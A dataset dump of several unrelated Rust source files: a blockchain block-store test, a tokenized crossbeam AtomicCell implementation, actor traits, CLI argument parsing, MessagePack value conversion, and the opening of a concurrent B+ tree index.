        let thread_count = 10;
        let write_count = 10;

        let mut handles = vec![];
        for t in 0..thread_count {
            let wc = write_count;
            let bs = bs.clone();
            let handle = thread::spawn(move || {
                for w in 0..wc {
                    let key = t * w;
                    let val = 42;
                    bs.put(&Hash256::from_low_u64_le(key), &vec![val]).unwrap();
                }
            });
            handles.push(handle);
        }

        for handle in handles {
            handle.join().unwrap();
        }

        for t in 0..thread_count {
            for w in 0..write_count {
                let key = t * w;
                assert!(bs.exists(&Hash256::from_low_u64_le(key)).unwrap());
                let val = bs.get(&Hash256::from_low_u64_le(key)).unwrap().unwrap();
                assert_eq!(vec![42], val);
            }
        }
    }

    #[test]
    #[ignore]
    fn test_block_at_slot() {
        let db = Arc::new(MemoryDB::open());
        let bs = Arc::new(BeaconBlockStore::new(db.clone()));
        let mut rng = XorShiftRng::from_seed([42; 16]);

        // Specify test block parameters.
        let hashes = [
            Hash256::from([0; 32]),
            Hash256::from([1; 32]),
            Hash256::from([2; 32]),
            Hash256::from([3; 32]),
            Hash256::from([4; 32]),
        ];
        let parent_hashes = [
            Hash256::from([255; 32]), // Genesis block.
            Hash256::from([0; 32]),
            Hash256::from([1; 32]),
            Hash256::from([2; 32]),
            Hash256::from([3; 32]),
        ];
        let unknown_hash = Hash256::from([101; 32]); // different from all above
        let slots: Vec<Slot> = vec![0, 1, 3, 4, 5].iter().map(|x| Slot::new(*x)).collect();

        // Generate a vec of random blocks and store them in the DB.
        let block_count = 5;
        let mut blocks: Vec<BeaconBlock> = Vec::with_capacity(5);
        for i in 0..block_count {
            let mut block = BeaconBlock::random_for_test(&mut rng);

            block.previous_block_root = parent_hashes[i];
            block.slot = slots[i];

            let ssz = ssz_encode(&block);
            db.put(DB_COLUMN, hashes[i].as_bytes(), &ssz).unwrap();

            blocks.push(block);
        }

        // Test that certain slots can be reached from certain hashes.
        let test_cases = vec![(4, 4), (4, 3), (4, 2), (4, 1), (4, 0)];
        for (hashes_index, slot_index) in test_cases {
            let (matched_block_hash, block) = bs
                .block_at_slot(&hashes[hashes_index], slots[slot_index])
                .unwrap()
                .unwrap();
            assert_eq!(matched_block_hash, hashes[slot_index]);
            assert_eq!(block.slot, slots[slot_index]);
        }

        let ssz = bs.block_at_slot(&hashes[4], Slot::new(2)).unwrap();
        assert_eq!(ssz, None);

        let ssz = bs.block_at_slot(&hashes[4], Slot::new(6)).unwrap();
        assert_eq!(ssz, None);

        let ssz = bs.block_at_slot(&unknown_hash, Slot::new(2));
        assert_eq!(
            ssz,
            Err(BeaconBlockAtSlotError::UnknownBeaconBlock(unknown_hash))
        );
    }
}
true
982a7a18f8c37a6ba242937c6ebea6a4adb7bedd
Rust
marco-c/gecko-dev-wordified-and-comments-removed
/third_party/rust/crossbeam-utils/src/atomic/atomic_cell.rs
UTF-8
19,180
2.703125
3
[ "Apache-2.0", "LicenseRef-scancode-unknown-license-reference", "MIT" ]
permissive
# ! [ allow ( clippy : : unit_arg ) ] use crate : : primitive : : sync : : atomic : : { self AtomicBool } ; use core : : cell : : UnsafeCell ; use core : : cmp ; use core : : fmt ; use core : : mem : : { self ManuallyDrop MaybeUninit } ; use core : : sync : : atomic : : Ordering ; use core : : ptr ; # [ cfg ( feature = " std " ) ] use std : : panic : : { RefUnwindSafe UnwindSafe } ; use super : : seq_lock : : SeqLock ; # [ repr ( transparent ) ] pub struct AtomicCell < T > { value : UnsafeCell < MaybeUninit < T > > } unsafe impl < T : Send > Send for AtomicCell < T > { } unsafe impl < T : Send > Sync for AtomicCell < T > { } # [ cfg ( feature = " std " ) ] impl < T > UnwindSafe for AtomicCell < T > { } # [ cfg ( feature = " std " ) ] impl < T > RefUnwindSafe for AtomicCell < T > { } impl < T > AtomicCell < T > { pub const fn new ( val : T ) - > AtomicCell < T > { AtomicCell { value : UnsafeCell : : new ( MaybeUninit : : new ( val ) ) } } pub fn into_inner ( self ) - > T { let this = ManuallyDrop : : new ( self ) ; unsafe { this . as_ptr ( ) . read ( ) } } pub const fn is_lock_free ( ) - > bool { atomic_is_lock_free : : < T > ( ) } pub fn store ( & self val : T ) { if mem : : needs_drop : : < T > ( ) { drop ( self . swap ( val ) ) ; } else { unsafe { atomic_store ( self . as_ptr ( ) val ) ; } } } pub fn swap ( & self val : T ) - > T { unsafe { atomic_swap ( self . as_ptr ( ) val ) } } # [ inline ] pub fn as_ptr ( & self ) - > * mut T { self . value . get ( ) . cast : : < T > ( ) } } impl < T : Default > AtomicCell < T > { pub fn take ( & self ) - > T { self . swap ( Default : : default ( ) ) } } impl < T : Copy > AtomicCell < T > { pub fn load ( & self ) - > T { unsafe { atomic_load ( self . as_ptr ( ) ) } } } impl < T : Copy + Eq > AtomicCell < T > { # [ deprecated ( note = " Use compare_exchange instead " ) ] pub fn compare_and_swap ( & self current : T new : T ) - > T { match self . compare_exchange ( current new ) { Ok ( v ) = > v Err ( v ) = > v } } pub fn compare_exchange ( & self current : T new : T ) - > Result < T T > { unsafe { atomic_compare_exchange_weak ( self . as_ptr ( ) current new ) } } # [ inline ] pub fn fetch_update < F > ( & self mut f : F ) - > Result < T T > where F : FnMut ( T ) - > Option < T > { let mut prev = self . load ( ) ; while let Some ( next ) = f ( prev ) { match self . compare_exchange ( prev next ) { x Ok ( _ ) = > return x Err ( next_prev ) = > prev = next_prev } } Err ( prev ) } } impl < T > Drop for AtomicCell < T > { fn drop ( & mut self ) { if mem : : needs_drop : : < T > ( ) { unsafe { self . as_ptr ( ) . drop_in_place ( ) ; } } } } macro_rules ! impl_arithmetic { ( t : ty fallback example : tt ) = > { impl AtomicCell < t > { / / / Increments the current value by val and returns the previous value . / / / / / / The addition wraps on overflow . / / / / / / # Examples / / / / / / # [ doc = example ] / / / / / / assert_eq ! ( a . fetch_add ( 3 ) 7 ) ; / / / assert_eq ! ( a . load ( ) 10 ) ; / / / # [ inline ] pub fn fetch_add ( & self val : t ) - > t { let _guard = lock ( self . as_ptr ( ) as usize ) . write ( ) ; let value = unsafe { & mut * ( self . as_ptr ( ) ) } ; let old = * value ; * value = value . wrapping_add ( val ) ; old } / / / Decrements the current value by val and returns the previous value . / / / / / / The subtraction wraps on overflow . / / / / / / # Examples / / / / / / # [ doc = example ] / / / / / / assert_eq ! ( a . fetch_sub ( 3 ) 7 ) ; / / / assert_eq ! ( a . 
load ( ) 4 ) ; / / / # [ inline ] pub fn fetch_sub ( & self val : t ) - > t { let _guard = lock ( self . as_ptr ( ) as usize ) . write ( ) ; let value = unsafe { & mut * ( self . as_ptr ( ) ) } ; let old = * value ; * value = value . wrapping_sub ( val ) ; old } / / / Applies bitwise " and " to the current value and returns the previous value . / / / / / / # Examples / / / / / / # [ doc = example ] / / / / / / assert_eq ! ( a . fetch_and ( 3 ) 7 ) ; / / / assert_eq ! ( a . load ( ) 3 ) ; / / / # [ inline ] pub fn fetch_and ( & self val : t ) - > t { let _guard = lock ( self . as_ptr ( ) as usize ) . write ( ) ; let value = unsafe { & mut * ( self . as_ptr ( ) ) } ; let old = * value ; * value & = val ; old } / / / Applies bitwise " nand " to the current value and returns the previous value . / / / / / / # Examples / / / / / / # [ doc = example ] / / / / / / assert_eq ! ( a . fetch_nand ( 3 ) 7 ) ; / / / assert_eq ! ( a . load ( ) ! ( 7 & 3 ) ) ; / / / # [ inline ] pub fn fetch_nand ( & self val : t ) - > t { let _guard = lock ( self . as_ptr ( ) as usize ) . write ( ) ; let value = unsafe { & mut * ( self . as_ptr ( ) ) } ; let old = * value ; * value = ! ( old & val ) ; old } / / / Applies bitwise " or " to the current value and returns the previous value . / / / / / / # Examples / / / / / / # [ doc = example ] / / / / / / assert_eq ! ( a . fetch_or ( 16 ) 7 ) ; / / / assert_eq ! ( a . load ( ) 23 ) ; / / / # [ inline ] pub fn fetch_or ( & self val : t ) - > t { let _guard = lock ( self . as_ptr ( ) as usize ) . write ( ) ; let value = unsafe { & mut * ( self . as_ptr ( ) ) } ; let old = * value ; * value | = val ; old } / / / Applies bitwise " xor " to the current value and returns the previous value . / / / / / / # Examples / / / / / / # [ doc = example ] / / / / / / assert_eq ! ( a . fetch_xor ( 2 ) 7 ) ; / / / assert_eq ! ( a . load ( ) 5 ) ; / / / # [ inline ] pub fn fetch_xor ( & self val : t ) - > t { let _guard = lock ( self . as_ptr ( ) as usize ) . write ( ) ; let value = unsafe { & mut * ( self . as_ptr ( ) ) } ; let old = * value ; * value ^ = val ; old } / / / Compares and sets the maximum of the current value and val # [ doc = example ] / / / / / / assert_eq ! ( a . fetch_max ( 2 ) 7 ) ; / / / assert_eq ! ( a . load ( ) 7 ) ; / / / # [ inline ] pub fn fetch_max ( & self val : t ) - > t { let _guard = lock ( self . as_ptr ( ) as usize ) . write ( ) ; let value = unsafe { & mut * ( self . as_ptr ( ) ) } ; let old = * value ; * value = cmp : : max ( old val ) ; old } / / / Compares and sets the minimum of the current value and val # [ doc = example ] / / / / / / assert_eq ! ( a . fetch_min ( 2 ) 7 ) ; / / / assert_eq ! ( a . load ( ) 2 ) ; / / / # [ inline ] pub fn fetch_min ( & self val : t ) - > t { let _guard = lock ( self . as_ptr ( ) as usize ) . write ( ) ; let value = unsafe { & mut * ( self . as_ptr ( ) ) } ; let old = * value ; * value = cmp : : min ( old val ) ; old } } } ; ( t : ty atomic : ty example : tt ) = > { impl AtomicCell < t > { / / / Increments the current value by val and returns the previous value . / / / / / / The addition wraps on overflow . / / / / / / # Examples / / / / / / # [ doc = example ] / / / / / / assert_eq ! ( a . fetch_add ( 3 ) 7 ) ; / / / assert_eq ! ( a . load ( ) 10 ) ; / / / # [ inline ] pub fn fetch_add ( & self val : t ) - > t { if can_transmute : : < t atomic > ( ) { let a = unsafe { & * ( self . as_ptr ( ) as * const atomic ) } ; a . fetch_add ( val Ordering : : AcqRel ) } else { let _guard = lock ( self . as_ptr ( ) as usize ) . 
write ( ) ; let value = unsafe { & mut * ( self . as_ptr ( ) ) } ; let old = * value ; * value = value . wrapping_add ( val ) ; old } } / / / Decrements the current value by val and returns the previous value . / / / / / / The subtraction wraps on overflow . / / / / / / # Examples / / / / / / # [ doc = example ] / / / / / / assert_eq ! ( a . fetch_sub ( 3 ) 7 ) ; / / / assert_eq ! ( a . load ( ) 4 ) ; / / / # [ inline ] pub fn fetch_sub ( & self val : t ) - > t { if can_transmute : : < t atomic > ( ) { let a = unsafe { & * ( self . as_ptr ( ) as * const atomic ) } ; a . fetch_sub ( val Ordering : : AcqRel ) } else { let _guard = lock ( self . as_ptr ( ) as usize ) . write ( ) ; let value = unsafe { & mut * ( self . as_ptr ( ) ) } ; let old = * value ; * value = value . wrapping_sub ( val ) ; old } } / / / Applies bitwise " and " to the current value and returns the previous value . / / / / / / # Examples / / / / / / # [ doc = example ] / / / / / / assert_eq ! ( a . fetch_and ( 3 ) 7 ) ; / / / assert_eq ! ( a . load ( ) 3 ) ; / / / # [ inline ] pub fn fetch_and ( & self val : t ) - > t { if can_transmute : : < t atomic > ( ) { let a = unsafe { & * ( self . as_ptr ( ) as * const atomic ) } ; a . fetch_and ( val Ordering : : AcqRel ) } else { let _guard = lock ( self . as_ptr ( ) as usize ) . write ( ) ; let value = unsafe { & mut * ( self . as_ptr ( ) ) } ; let old = * value ; * value & = val ; old } } / / / Applies bitwise " nand " to the current value and returns the previous value . / / / / / / # Examples / / / / / / # [ doc = example ] / / / / / / assert_eq ! ( a . fetch_nand ( 3 ) 7 ) ; / / / assert_eq ! ( a . load ( ) ! ( 7 & 3 ) ) ; / / / # [ inline ] pub fn fetch_nand ( & self val : t ) - > t { if can_transmute : : < t atomic > ( ) { let a = unsafe { & * ( self . as_ptr ( ) as * const atomic ) } ; a . fetch_nand ( val Ordering : : AcqRel ) } else { let _guard = lock ( self . as_ptr ( ) as usize ) . write ( ) ; let value = unsafe { & mut * ( self . as_ptr ( ) ) } ; let old = * value ; * value = ! ( old & val ) ; old } } / / / Applies bitwise " or " to the current value and returns the previous value . / / / / / / # Examples / / / / / / # [ doc = example ] / / / / / / assert_eq ! ( a . fetch_or ( 16 ) 7 ) ; / / / assert_eq ! ( a . load ( ) 23 ) ; / / / # [ inline ] pub fn fetch_or ( & self val : t ) - > t { if can_transmute : : < t atomic > ( ) { let a = unsafe { & * ( self . as_ptr ( ) as * const atomic ) } ; a . fetch_or ( val Ordering : : AcqRel ) } else { let _guard = lock ( self . as_ptr ( ) as usize ) . write ( ) ; let value = unsafe { & mut * ( self . as_ptr ( ) ) } ; let old = * value ; * value | = val ; old } } / / / Applies bitwise " xor " to the current value and returns the previous value . / / / / / / # Examples / / / / / / # [ doc = example ] / / / / / / assert_eq ! ( a . fetch_xor ( 2 ) 7 ) ; / / / assert_eq ! ( a . load ( ) 5 ) ; / / / # [ inline ] pub fn fetch_xor ( & self val : t ) - > t { if can_transmute : : < t atomic > ( ) { let a = unsafe { & * ( self . as_ptr ( ) as * const atomic ) } ; a . fetch_xor ( val Ordering : : AcqRel ) } else { let _guard = lock ( self . as_ptr ( ) as usize ) . write ( ) ; let value = unsafe { & mut * ( self . as_ptr ( ) ) } ; let old = * value ; * value ^ = val ; old } } / / / Compares and sets the maximum of the current value and val # [ doc = example ] / / / / / / assert_eq ! ( a . fetch_max ( 9 ) 7 ) ; / / / assert_eq ! ( a . 
load ( ) 9 ) ; / / / # [ inline ] pub fn fetch_max ( & self val : t ) - > t { if can_transmute : : < t atomic > ( ) { / / TODO : Atomic * : : fetch_max requires Rust 1 . 45 . self . fetch_update ( | old | Some ( cmp : : max ( old val ) ) ) . unwrap ( ) } else { let _guard = lock ( self . as_ptr ( ) as usize ) . write ( ) ; let value = unsafe { & mut * ( self . as_ptr ( ) ) } ; let old = * value ; * value = cmp : : max ( old val ) ; old } } / / / Compares and sets the minimum of the current value and val # [ doc = example ] / / / / / / assert_eq ! ( a . fetch_min ( 2 ) 7 ) ; / / / assert_eq ! ( a . load ( ) 2 ) ; / / / # [ inline ] pub fn fetch_min ( & self val : t ) - > t { if can_transmute : : < t atomic > ( ) { / / TODO : Atomic * : : fetch_min requires Rust 1 . 45 . self . fetch_update ( | old | Some ( cmp : : min ( old val ) ) ) . unwrap ( ) } else { let _guard = lock ( self . as_ptr ( ) as usize ) . write ( ) ; let value = unsafe { & mut * ( self . as_ptr ( ) ) } ; let old = * value ; * value = cmp : : min ( old val ) ; old } } } } ; } impl_arithmetic ! ( u8 atomic : : AtomicU8 " let a = AtomicCell : : new ( 7u8 ) ; " ) ; impl_arithmetic ! ( i8 atomic : : AtomicI8 " let a = AtomicCell : : new ( 7i8 ) ; " ) ; impl_arithmetic ! ( u16 atomic : : AtomicU16 " let a = AtomicCell : : new ( 7u16 ) ; " ) ; impl_arithmetic ! ( i16 atomic : : AtomicI16 " let a = AtomicCell : : new ( 7i16 ) ; " ) ; impl_arithmetic ! ( u32 atomic : : AtomicU32 " let a = AtomicCell : : new ( 7u32 ) ; " ) ; impl_arithmetic ! ( i32 atomic : : AtomicI32 " let a = AtomicCell : : new ( 7i32 ) ; " ) ; # [ cfg ( not ( crossbeam_no_atomic_64 ) ) ] impl_arithmetic ! ( u64 atomic : : AtomicU64 " let a = AtomicCell : : new ( 7u64 ) ; " ) ; # [ cfg ( not ( crossbeam_no_atomic_64 ) ) ] impl_arithmetic ! ( i64 atomic : : AtomicI64 " let a = AtomicCell : : new ( 7i64 ) ; " ) ; # [ cfg ( crossbeam_no_atomic_64 ) ] impl_arithmetic ! ( u64 fallback " let a = AtomicCell : : new ( 7u64 ) ; " ) ; # [ cfg ( crossbeam_no_atomic_64 ) ] impl_arithmetic ! ( i64 fallback " let a = AtomicCell : : new ( 7i64 ) ; " ) ; impl_arithmetic ! ( u128 fallback " let a = AtomicCell : : new ( 7u128 ) ; " ) ; impl_arithmetic ! ( i128 fallback " let a = AtomicCell : : new ( 7i128 ) ; " ) ; impl_arithmetic ! ( usize atomic : : AtomicUsize " let a = AtomicCell : : new ( 7usize ) ; " ) ; impl_arithmetic ! ( isize atomic : : AtomicIsize " let a = AtomicCell : : new ( 7isize ) ; " ) ; impl AtomicCell < bool > { # [ inline ] pub fn fetch_and ( & self val : bool ) - > bool { let a = unsafe { & * ( self . as_ptr ( ) as * const AtomicBool ) } ; a . fetch_and ( val Ordering : : AcqRel ) } # [ inline ] pub fn fetch_nand ( & self val : bool ) - > bool { let a = unsafe { & * ( self . as_ptr ( ) as * const AtomicBool ) } ; a . fetch_nand ( val Ordering : : AcqRel ) } # [ inline ] pub fn fetch_or ( & self val : bool ) - > bool { let a = unsafe { & * ( self . as_ptr ( ) as * const AtomicBool ) } ; a . fetch_or ( val Ordering : : AcqRel ) } # [ inline ] pub fn fetch_xor ( & self val : bool ) - > bool { let a = unsafe { & * ( self . as_ptr ( ) as * const AtomicBool ) } ; a . 
fetch_xor ( val Ordering : : AcqRel ) } } impl < T : Default > Default for AtomicCell < T > { fn default ( ) - > AtomicCell < T > { AtomicCell : : new ( T : : default ( ) ) } } impl < T > From < T > for AtomicCell < T > { # [ inline ] fn from ( val : T ) - > AtomicCell < T > { AtomicCell : : new ( val ) } } impl < T : Copy + fmt : : Debug > fmt : : Debug for AtomicCell < T > { fn fmt ( & self f : & mut fmt : : Formatter < ' _ > ) - > fmt : : Result { f . debug_struct ( " AtomicCell " ) . field ( " value " & self . load ( ) ) . finish ( ) } } const fn can_transmute < A B > ( ) - > bool { ( mem : : size_of : : < A > ( ) = = mem : : size_of : : < B > ( ) ) & ( mem : : align_of : : < A > ( ) > = mem : : align_of : : < B > ( ) ) } # [ inline ] # [ must_use ] fn lock ( addr : usize ) - > & ' static SeqLock { const LEN : usize = 97 ; # [ allow ( clippy : : declare_interior_mutable_const ) ] const L : SeqLock = SeqLock : : new ( ) ; static LOCKS : [ SeqLock ; LEN ] = [ L ; LEN ] ; & LOCKS [ addr % LEN ] } struct AtomicUnit ; impl AtomicUnit { # [ inline ] fn load ( & self _order : Ordering ) { } # [ inline ] fn store ( & self _val : ( ) _order : Ordering ) { } # [ inline ] fn swap ( & self _val : ( ) _order : Ordering ) { } # [ inline ] fn compare_exchange_weak ( & self _current : ( ) _new : ( ) _success : Ordering _failure : Ordering ) - > Result < ( ) ( ) > { Ok ( ( ) ) } } macro_rules ! atomic { ( check t : ty atomic : ty a : ident atomic_op : expr ) = > { if can_transmute : : < t atomic > ( ) { let a : & atomic ; break atomic_op ; } } ; ( t : ty a : ident atomic_op : expr fallback_op : expr ) = > { loop { atomic ! ( check t AtomicUnit a atomic_op ) ; atomic ! ( check t atomic : : AtomicU8 a atomic_op ) ; atomic ! ( check t atomic : : AtomicU16 a atomic_op ) ; atomic ! ( check t atomic : : AtomicU32 a atomic_op ) ; # [ cfg ( not ( crossbeam_no_atomic_64 ) ) ] atomic ! ( check t atomic : : AtomicU64 a atomic_op ) ; / / TODO : AtomicU128 is unstable / / atomic ! ( check t atomic : : AtomicU128 a atomic_op ) ; break fallback_op ; } } ; } const fn atomic_is_lock_free < T > ( ) - > bool { let is_lock_free = can_transmute : : < T AtomicUnit > ( ) | can_transmute : : < T atomic : : AtomicU8 > ( ) | can_transmute : : < T atomic : : AtomicU16 > ( ) | can_transmute : : < T atomic : : AtomicU32 > ( ) ; # [ cfg ( not ( crossbeam_no_atomic_64 ) ) ] let is_lock_free = is_lock_free | can_transmute : : < T atomic : : AtomicU64 > ( ) ; is_lock_free } unsafe fn atomic_load < T > ( src : * mut T ) - > T where T : Copy { atomic ! { T a { a = & * ( src as * const _ as * const _ ) ; mem : : transmute_copy ( & a . load ( Ordering : : Acquire ) ) } { let lock = lock ( src as usize ) ; / / Try doing an optimistic read first . if let Some ( stamp ) = lock . optimistic_read ( ) { / / We need a volatile read here because other threads might concurrently modify the / / value . In theory data races are * always * UB even if we use volatile reads and / / discard the data when a data race is detected . The proper solution would be to / / do atomic reads and atomic writes but we can ' t atomically read and write all / / kinds of data since AtomicU8 is not available on stable Rust yet . / / Load as MaybeUninit because we may load a value that is not valid as T . let val = ptr : : read_volatile ( src . cast : : < MaybeUninit < T > > ( ) ) ; if lock . validate_read ( stamp ) { return val . assume_init ( ) ; } } / / Grab a regular write lock so that writers don ' t starve this load . let guard = lock . 
write ( ) ; let val = ptr : : read ( src ) ; / / The value hasn ' t been changed . Drop the guard without incrementing the stamp . guard . abort ( ) ; val } } } unsafe fn atomic_store < T > ( dst : * mut T val : T ) { atomic ! { T a { a = & * ( dst as * const _ as * const _ ) ; a . store ( mem : : transmute_copy ( & val ) Ordering : : Release ) ; mem : : forget ( val ) ; } { let _guard = lock ( dst as usize ) . write ( ) ; ptr : : write ( dst val ) ; } } } unsafe fn atomic_swap < T > ( dst : * mut T val : T ) - > T { atomic ! { T a { a = & * ( dst as * const _ as * const _ ) ; let res = mem : : transmute_copy ( & a . swap ( mem : : transmute_copy ( & val ) Ordering : : AcqRel ) ) ; mem : : forget ( val ) ; res } { let _guard = lock ( dst as usize ) . write ( ) ; ptr : : replace ( dst val ) } } } # [ allow ( clippy : : let_unit_value ) ] unsafe fn atomic_compare_exchange_weak < T > ( dst : * mut T mut current : T new : T ) - > Result < T T > where T : Copy + Eq { atomic ! { T a { a = & * ( dst as * const _ as * const _ ) ; let mut current_raw = mem : : transmute_copy ( & current ) ; let new_raw = mem : : transmute_copy ( & new ) ; loop { match a . compare_exchange_weak ( current_raw new_raw Ordering : : AcqRel Ordering : : Acquire ) { Ok ( _ ) = > break Ok ( current ) Err ( previous_raw ) = > { let previous = mem : : transmute_copy ( & previous_raw ) ; if ! T : : eq ( & previous & current ) { break Err ( previous ) ; } / / The compare - exchange operation has failed and didn ' t store new . The / / failure is either spurious or previous was semantically equal to / / current but not byte - equal . Let ' s retry with previous as the new / / current . current = previous ; current_raw = previous_raw ; } } } } { let guard = lock ( dst as usize ) . write ( ) ; if T : : eq ( & * dst & current ) { Ok ( ptr : : replace ( dst new ) ) } else { let val = ptr : : read ( dst ) ; / / The value hasn ' t been changed . Drop the guard without incrementing the stamp . guard . abort ( ) ; Err ( val ) } } } }
true
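The file above is a whitespace-tokenized copy of AtomicCell from crossbeam-utils. Below is a brief sketch of the public API it implements, written against the published crossbeam-utils crate rather than this transformed copy.

use crossbeam_utils::atomic::AtomicCell;

fn main() {
    let cell = AtomicCell::new(7i32);
    assert_eq!(cell.fetch_add(3), 7); // fetch_* methods return the previous value
    assert_eq!(cell.load(), 10);
    assert_eq!(cell.swap(1), 10);
    assert_eq!(cell.take(), 1); // take() leaves the Default value (0) behind
    assert_eq!(cell.load(), 0);
}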
bf17204e361cf2852381aca655e8fcfc7724f353
Rust
delandtj/kay
/src/actor.rs
UTF-8
625
2.609375
3
[ "MIT" ]
permissive
use compact::Compact;

use crate::id::{RawID, TypedID};
use crate::storage_aware::StorageAware;

pub trait ActorOrActorTrait: 'static {
    type ID: TypedID;
}

impl<A: Actor> ActorOrActorTrait for A {
    type ID = <Self as Actor>::ID;
}

pub trait Actor: Compact + StorageAware + 'static {
    type ID: TypedID;

    fn id(&self) -> Self::ID;

    unsafe fn set_id(&mut self, id: RawID);

    fn id_as<TargetID: TraitIDFrom<Self>>(&self) -> TargetID {
        TargetID::from(self.id())
    }
}

pub trait TraitIDFrom<A: Actor>: TypedID {
    fn from(id: <A as Actor>::ID) -> Self {
        Self::from_raw(id.as_raw())
    }
}
true
c0164e78709438f82109a92ce7728126cead297b
Rust
kennytm/borsholder
/src/args.rs
UTF-8
2,103
3.140625
3
[ "MIT" ]
permissive
//! Argument parsing

use reqwest::Url;
use serde::Serializer;
use std::net::SocketAddr;
use std::path::PathBuf;

/// Stores the command line argument.
#[derive(Debug, StructOpt, Serialize)]
pub struct Args {
    /// The token to access the GitHub APIs.
    #[structopt(short = "t", long = "token", help = "GitHub token")]
    pub token: String,

    /// Owner of the GitHub repository.
    #[structopt(long = "owner", help = "Repository owner", default_value = "rust-lang")]
    pub owner: String,

    /// Name of the GitHub repository.
    #[structopt(long = "repository", help = "Repository name", default_value = "rust")]
    pub repository: String,

    /// URL to access the Homu queue.
    #[structopt(
        long = "homu-queue-url",
        help = "URL to the Homu queue",
        default_value = "https://buildbot2.rust-lang.org/homu/queue/rust"
    )]
    #[serde(serialize_with = "serialize_url")]
    pub homu_url: Url,

    /// Client ID of the Homu GitHub OAuth App.
    #[structopt(
        long = "homu-client-id",
        help = "Client ID of the Homu GitHub OAuth App",
        default_value = "f828d548f928f1e11199"
    )]
    pub homu_client_id: String,

    /// Socket address of the local web server.
    #[structopt(
        short = "l",
        long = "listen",
        help = "Address of local server",
        default_value = "127.0.0.1:55727"
    )]
    pub address: SocketAddr,

    /// Directory to find Tera templates and static resources
    #[structopt(
        short = "i",
        long = "templates",
        help = "Directory of the templates",
        default_value = "res",
        parse(from_os_str)
    )]
    #[serde(skip_serializing)]
    pub templates: PathBuf,

    /// HTTP(S) proxy server. If not `None`, all API requests will pass through this URL.
    #[structopt(short = "p", long = "proxy", help = "HTTP(S) proxy server")]
    #[serde(skip_serializing)]
    pub proxy: Option<Url>,
}

/// Serializes a URL using serde.
fn serialize_url<S: Serializer>(url: &Url, serializer: S) -> Result<S::Ok, S::Error> {
    serializer.serialize_str(url.as_str())
}
true
52878630ad486c4e22dca0785dfc6f9afc61a73d
Rust
dflemstr/rq
/src/value/messagepack.rs
UTF-8
3,886
2.6875
3
[ "Apache-2.0" ]
permissive
use std::io; use ordered_float; use rmpv; use crate::error; use crate::value; #[derive(Debug)] pub struct MessagePackSource<R>(R) where R: io::Read; #[derive(Debug)] pub struct MessagePackSink<W>(W) where W: io::Write; #[inline] pub fn source<R>(r: R) -> MessagePackSource<R> where R: io::Read, { MessagePackSource(r) } #[inline] pub fn sink<W>(w: W) -> MessagePackSink<W> where W: io::Write, { MessagePackSink(w) } impl<R> value::Source for MessagePackSource<R> where R: io::Read, { #[inline] fn read(&mut self) -> error::Result<Option<value::Value>> { use rmpv::decode::Error; match rmpv::decode::value::read_value(&mut self.0) { Ok(v) => Ok(Some(value_from_message_pack(v)?)), Err(Error::InvalidMarkerRead(ref e)) if e.kind() == io::ErrorKind::UnexpectedEof => { Ok(None) } Err(e) => Err(error::Error::MessagePackDecode(e)), } } } impl<W> value::Sink for MessagePackSink<W> where W: io::Write, { #[inline] fn write(&mut self, v: value::Value) -> error::Result<()> { rmpv::encode::write_value(&mut self.0, &value_to_message_pack(v)).map_err(From::from) } } fn value_from_message_pack(value: rmpv::Value) -> error::Result<value::Value> { use rmpv::Value; match value { Value::Nil => Ok(value::Value::Unit), Value::Boolean(v) => Ok(value::Value::Bool(v)), Value::Integer(i) if i.is_u64() => Ok(value::Value::U64(i.as_u64().unwrap())), Value::Integer(i) if i.is_i64() => Ok(value::Value::I64(i.as_i64().unwrap())), Value::Integer(_) => unreachable!(), Value::F32(v) => Ok(value::Value::from_f32(v)), Value::F64(v) => Ok(value::Value::from_f64(v)), Value::String(v) => { if v.is_err() { Err(error::Error::Format { msg: v.as_err().unwrap().to_string(), }) } else { Ok(value::Value::String(v.into_str().unwrap())) } } Value::Ext(_, v) | Value::Binary(v) => Ok(value::Value::Bytes(v)), Value::Array(v) => Ok(value::Value::Sequence( v.into_iter() .map(value_from_message_pack) .collect::<error::Result<_>>()?, )), Value::Map(v) => Ok(value::Value::Map( v.into_iter() .map(|(k, v)| Ok((value_from_message_pack(k)?, value_from_message_pack(v)?))) .collect::<error::Result<_>>()?, )), } } fn value_to_message_pack(value: value::Value) -> rmpv::Value { use rmpv::Value; match value { value::Value::Unit => Value::Nil, value::Value::Bool(v) => Value::Boolean(v), value::Value::I8(v) => Value::Integer(v.into()), value::Value::I16(v) => Value::Integer(v.into()), value::Value::I32(v) => Value::Integer(v.into()), value::Value::I64(v) => Value::Integer(v.into()), value::Value::U8(v) => Value::Integer(v.into()), value::Value::U16(v) => Value::Integer(v.into()), value::Value::U32(v) => Value::Integer(v.into()), value::Value::U64(v) => Value::Integer(v.into()), value::Value::F32(ordered_float::OrderedFloat(v)) => Value::F32(v), value::Value::F64(ordered_float::OrderedFloat(v)) => Value::F64(v), value::Value::Char(v) => Value::String(format!("{}", v).into()), value::Value::String(v) => Value::String(v.into()), value::Value::Bytes(v) => Value::Binary(v), value::Value::Sequence(v) => { Value::Array(v.into_iter().map(value_to_message_pack).collect()) } value::Value::Map(v) => Value::Map( v.into_iter() .map(|(k, v)| (value_to_message_pack(k), value_to_message_pack(v))) .collect(), ), } }
true
eaae369f9c009aaabd7abcdb7e99ca1796a1266c
Rust
declanvk/scalable-concurrent-containers
/src/tree_index.rs
UTF-8
21,782
3.0625
3
[ "Apache-2.0" ]
permissive
//! The module implements [`TreeIndex`]. mod error; mod leaf; mod leaf_node; mod node; use crate::ebr::{Arc, AtomicArc, Barrier, Tag}; use error::{InsertError, RemoveError, SearchError}; use leaf::{Leaf, Scanner}; use node::Node; use std::borrow::Borrow; use std::cmp::Ordering; use std::fmt; use std::iter::FusedIterator; use std::ops::Bound::{Excluded, Included, Unbounded}; use std::ops::RangeBounds; use std::sync::atomic::Ordering::{AcqRel, Acquire, Relaxed}; /// A scalable concurrent B+ tree. /// /// [`TreeIndex`] is a B+ tree variant that is optimized for read operations. Read operations, /// such as read, scan, are neither blocked nor interrupted by other threads. Write operations, /// such as insert, remove, do not block if they do not entail structural changes to the tree. /// /// ## The key features of [`TreeIndex`] /// /// * Write-free read: read operations never modify the shared data. /// * Near lock-free write: write operations do not block unless a structural change is needed. /// /// ## The key statistics for [`TreeIndex`] /// /// * The maximum number of key-value pairs that a leaf can store: 8. /// * The maximum number of leaves or child nodes that a node can point to: 9. /// * The size of metadata per key-value pair in a leaf: 3-byte. /// * The size of metadata per leaf or node in a node: `size_of(K)` + 4. pub struct TreeIndex<K, V> where K: 'static + Clone + Ord + Send + Sync, V: 'static + Clone + Send + Sync, { root: AtomicArc<Node<K, V>>, } impl<K, V> TreeIndex<K, V> where 